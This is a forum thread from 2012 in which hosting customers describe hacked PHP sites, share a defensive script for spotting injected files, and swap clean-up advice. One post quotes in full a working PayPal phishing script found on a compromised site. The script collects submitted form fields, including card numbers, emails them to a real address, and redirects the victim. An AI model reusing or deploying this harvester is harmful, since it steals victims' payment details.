Current time: 04-20-2014, 04:43 AM Hello There, Guest! (LoginRegister)

Post Reply 
Sites hacked
02-29-2012, 11:38 AM
Post: #101
RE: Sites hacked
(02-29-2012 06:46 AM)artgeek Wrote:  But, since many are complaining about just WP sites being damaged, it's something targeting those, perhaps?

I do not think so, it just happens that there are so many WP sites. In your case you say it was a Joompla plugin, I had sites with Textpattern or MODx also attacked, or with a homegrown CMS. A friend running his own framework found a malicious file. He does not allow the execution of php outside of his framework, so it did not come to nothing, but the initial file was there.
Visit this user's website Find all posts by this user
Quote this message in a reply
02-29-2012, 12:19 PM
Post: #102
RE: Sites hacked
it's not just wordpress. my invision forum files also had redirect code injected into them. i deleted all the files and did a fresh install of the latest versions of both invision and wordpress. i changed the passwords etc., switched to sftp only. everything was fine for a week, and then the same thing happened again. i have again deleted and re-installed all the wordpress files, and am in the process of doing that with the forum software as well. but i've no guarantee that the same thing won't happen again in a few days.

if this problem is a result of a server-end exploit what ways are there for us to prevent this? i have no third party plugins on wordpress or any modifications to invision, and it seems unlikely that the problem lies with wordpress or invision.
Find all posts by this user
Quote this message in a reply
02-29-2012, 01:38 PM
Post: #103
RE: Sites hacked
(02-25-2012 10:30 AM)Kris@WLP Wrote:  For Windozers like myself, how do we get a UNIX command prompt?

Try Bitvise Tunnelier it'll give you both a terminal and a GUI SCP, FileManager looking window.

Jw

A person who never made a mistake never tried anything new. - Albert Einstein
Find all posts by this user
Quote this message in a reply
02-29-2012, 01:55 PM
Post: #104
RE: Sites hacked
Add me to the list of DH customers affected by this. One of my 5 WP sites was hacked. It doesn't appear the other 4 were, but I'm running the clean script just in case.
Find all posts by this user
Quote this message in a reply
02-29-2012, 02:06 PM
Post: #105
RE: Sites hacked
After five years hosting two domains in Dreamhost, with no security incidents, I found today that ALL my php files in my account (even my own test.php files, outside any application; 6589 files ) had been injected, timestamp Feb 24 20:34 PST

I have only one ssh active account, the "last" command does not show any suspicious logins. And my password (already changed) was pretty secure.
The permissions also seems ok to me, look at the differences (the tar was archived a week before)

[lilongwe]~ $ tar tvzf backups/backupquick1.tar.gz blog2/wp-config.php
-rw-r----- hgonzal/pg1088916 3614 2012-02-15 08:03 blog2/wp-config.php
[lilongwe]~ $ l hjg.com.ar.hacked/blog2/wp-config.php
-rw-r----- 1 hgonzal pg1088916 10837 Feb 24 20:33 hjg.com.ar.hacked/blog2/wp-config.php

This is pretty scaring, as suggests (to me) some scalability vulnerability.
Visit this user's website Find all posts by this user
Quote this message in a reply
02-29-2012, 03:32 PM
Post: #106
RE: Sites hacked
You might have a shell lurking in your userspace (that cleaner just patches some injected redirects).

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost
Visit this user's website Find all posts by this user
Quote this message in a reply
02-29-2012, 06:04 PM
Post: #107
RE: Sites hacked
how does one locate and remove any lurking shells?
Find all posts by this user
Quote this message in a reply
02-29-2012, 07:10 PM
Post: #108
RE: Sites hacked
(02-29-2012 06:04 PM)arnabchakladar Wrote:  how does one locate and remove any lurking shells?

I suppose that with "ps aux". But doing this I realized (what I already knew, but had forgotten) that Dreamhost runs php53.cgi in sudo mode (as the respective user). This makes everything more understandable, and there is no need to suspect about scalation vulnerabilities: anyone who can upload a php script to my domain can execute it as my user (and do a lot of harm).

I had cleared all the injected php files, but I had missed the "bootstrap" scripts, those which made the injection. To this I made this little script : suspicious_php.sh

Code:
#!/bin/sh
#  prints filename if first 2 lines has more than 5000 bytes
file=$1
bytes=`head -n 2 $file | wc --bytes `
if (( bytes > 5000 ))
then
  echo $file
fi

and run

Code:
ls -lad `find . -name '*.php'  -type f -exec ./suspicious_php.sh '{}' \;`

and got:

Code:
-rw-r--r-- 1 hgonzal       pg1088916 28278 Feb 14 23:46 blog2d/tmp/si-contact-form/captcha/temp/r.php
-rw-rw-r-- 1 hgonzal       pg1088916 21675 Feb 29 15:49 foro/style.php
-rw-r--r-- 1 rockitscience pg1161296 21675 Jan 19 14:22 zanganos/2010/02/style.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/2009/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/assets_c/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/images/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/ref/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/txt/r.php

These are the bad guys. These files also pushes the original intruding incident more earlier in time: these scripts are dormant until someone executes them remotely. What I still don't understand is how these scripts got there, (perhaps some vulnerability in a wordpress plugin?) and specially why they have those ownerships ('hgonzal' is my user, the others are not related) . Whatever, I'll delete them and keep an eye on future appearances.
Visit this user's website Find all posts by this user
Quote this message in a reply
02-29-2012, 10:01 PM
Post: #109
RE: Sites hacked
thanks to everyone who contributed clean-up scripts to scrub infected php files. that helped me clean up 4 WP sites hosted through dreamhost. today however, we received an email from someone who had received paypal phishing spam linking to 2 new files in the root directory of one of those WP sites:
pp.php and index1.php. both of those files had dates indicating they had been around for only a day or less. they both contained the same code:
Code:
<?php

foreach($_POST as $key => $val)
{
$msg .= "$key - $val \r\n";    
}
$cardnumber = $_POST['cardnumber'];
if(empty($cardnumber))
{
die(header("Location: https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US"));
}
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$msg .= "IP $$ip
Agent $agent";
$to = "smokeyalrman@gmail.com";
$subject = "Sining in Sun $cardnumber";
// echo $msg;
$body = "Hi,\n\nHow are you? $cardnumber";
if (mail($to, $subject, $msg)) {
   header("Location: https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US");
   //echo("<p>Message successfully sent!</p>");
  } else {
   echo("<p>Message delivery failed...</p>");
  }
?>

i've renamed those files (should probably just delete them), but was wondering if anyone else had run into this issue yet. and is it worth even reporting this to dreamhost at this point? their response to me on the first hack was a joke.

thanks, and good luck out there. if anyone can recommend a hosting service that can easily migrate over entire sites, i'm all ears.

-rob
Find all posts by this user
Quote this message in a reply
02-29-2012, 10:32 PM (This post was last modified: 02-29-2012 10:33 PM by imonglue.)
Post: #110
RE: Sites hacked
At this moment I really don't have the patience to read all posts here, so I am sorry for probably posting something that has probably already been answered numerous times.

You can add me to the list - all four of my WordPress installs are infected. I opened a support ticket and am waiting to hear back, but is there nothing Dreamhost can do? Do I need clean up all my sites myself? Delete and reinstall, etc?
Find all posts by this user
Quote this message in a reply
Post Reply 


Forum Jump: